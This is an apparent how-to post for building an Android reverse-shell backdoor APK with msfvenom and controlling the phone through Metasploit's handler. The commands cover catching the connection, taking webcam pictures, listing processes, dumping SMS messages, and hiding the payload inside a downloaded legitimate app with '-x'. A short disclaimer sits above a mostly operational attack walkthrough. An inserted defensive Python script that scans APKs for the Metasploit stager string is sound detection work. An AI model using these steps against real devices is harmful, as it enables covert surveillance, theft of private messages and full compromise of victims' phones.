[Android + msf]How to use Metasploit Framework on an Android Device?

Requirements: Metasploit Framework (msf)

  • A Linux-based OS.
  • msfconsole installed on your machine.
  • msfvenom correctly installed on the machine. This will be used to generate the backdoor.
  • apktool installed as well.

Note: This tutorial is meant for educational purposes only. Please don't misuse it; you'll be responsible for any act of hacking or theft.


1) First of all, open up your terminal (Ctrl + Alt + T) and update your repositories before starting:
$ sudo apt-get update

2) Once updated, we can start. Simply follow the steps below to get started:
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=<port> -o testfile.apk
Replace "testfile" with any name you want (the -o option writes the APK directly; older msfvenom versions use "R > testfile.apk" instead). The generated APK contains the main activity which, when tapped on the Android device, connects back to meterpreter on your terminal and lets you gain full access to the victim's Android phone.

  • You can check out the architecture list for msfvenom here!

Set LHOST to the IP address of your machine and LPORT to any port number which is not being used on your network, e.g. 4444.
$ ifconfig
ifconfig will give you the IP address you need to start the exploit (on newer distributions, "ip addr" shows the same information).

3) Once you've set LHOST and LPORT, Press Enter and wait till the Main activity is created.

4) After it's created, simply move the apk file to your phone and install it.

5) Open msfconsole in your terminal:
$ sudo msfconsole

6) Once the console is up, load the handler and set it to the same payload, host and port you used with msfvenom:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <your-ip>
msf exploit(handler) > set LPORT <port>

7) Almost done!
Run the exploit and tap on the main activity you just installed on your Android phone. This will give you access to the Android phone from the terminal.
msf exploit(handler) > exploit

8) Meterpreter should be up and running by now. Run the help command to see the commands you can use, for example:
meterpreter > webcam_snap -i 2
You can also generate the backdoor inside an existing app.
Simply download the app from the internet, and use '-x' to specify the name of the app you just downloaded.

After msfvenom has recreated the app, install it on your Android phone; the remaining steps remain the same.
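From the defender's side, both the stand-alone APK from step 2 and an app rebuilt with '-x' carry the Metasploit stager classes, so an APK can be triaged before it is installed. The following Python script is an added example, not code from the original post or from Metasploit. It assumes that the stock msfvenom Android payload is built from the package com.metasploit.stage (so its classes.dex contains type descriptors such as Lcom/metasploit/stage/Payload;); verify that against your Metasploit version. The APK samples it scans are constructed in memory.

```python
"""Added example: flag an APK whose classes.dex references the Metasploit stager.

Assumption: the stock msfvenom Android payload uses the package
com.metasploit.stage, so its dex code carries descriptors starting with
Lcom/metasploit/stage/ . All other data below is constructed sample input.
"""
import io
import zipfile

# Type-descriptor prefix shared by the stock stager classes (assumption, see above).
MSF_STAGE_MARKER = b"Lcom/metasploit/stage/"
# Every dex file starts with the "dex\n" magic followed by a version string.
DEX_MAGIC = b"dex\n"


def scan_apk(apk_bytes: bytes) -> dict:
    """Inspect an APK (a zip) and report whether any dex file references the stager.

    Returns the dex entries seen and the subset containing the marker, so the
    caller can log or alert on them.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        names = [n for n in zf.namelist()
                 if n.startswith("classes") and n.endswith(".dex")]
        for name in names:
            data = zf.read(name)
            # Skip entries that only pretend to be dex files.
            if not data.startswith(DEX_MAGIC):
                continue
            if MSF_STAGE_MARKER in data:
                hits.append(name)
    return {"dex_files": names, "msf_hits": hits, "suspicious": bool(hits)}


def build_sample_apk(dex_payload: bytes) -> bytes:
    """Construct a minimal APK-like zip holding one classes.dex (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<constructed placeholder>")
        zf.writestr("classes.dex", b"dex\n035\x00" + dex_payload)
    return buf.getvalue()


# Constructed samples: a benign-looking dex and one carrying the stager descriptor.
BENIGN_APK = build_sample_apk(b"Lcom/example/notes/MainActivity;")
STAGED_APK = build_sample_apk(
    b"Lcom/example/notes/MainActivity;Lcom/metasploit/stage/Payload;"
)

if __name__ == "__main__":
    for label, apk in (("benign", BENIGN_APK), ("staged", STAGED_APK)):
        print(label, scan_apk(apk))
```

This is a quick string-level triage of the unmodified msfvenom output: an APK whose stager classes have been renamed or obfuscated will not match, so treat a clean result as "nothing obvious found" rather than "safe", and pair the check with the permissions the app requests and a proper mobile AV scan.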

  • webcam_snap
    This will take a picture from the camera you specified, provided the Android phone has both a front and a back camera. The camera is specified by index (-i):
    1: Front Camera
    2: Back Camera
  • ps
    Will list all running activities on the phone.
  • dump_sms
    Will save all the messages sent and received on the Android phone to an external .txt file.

If you're having trouble, please leave it in the comments section below.
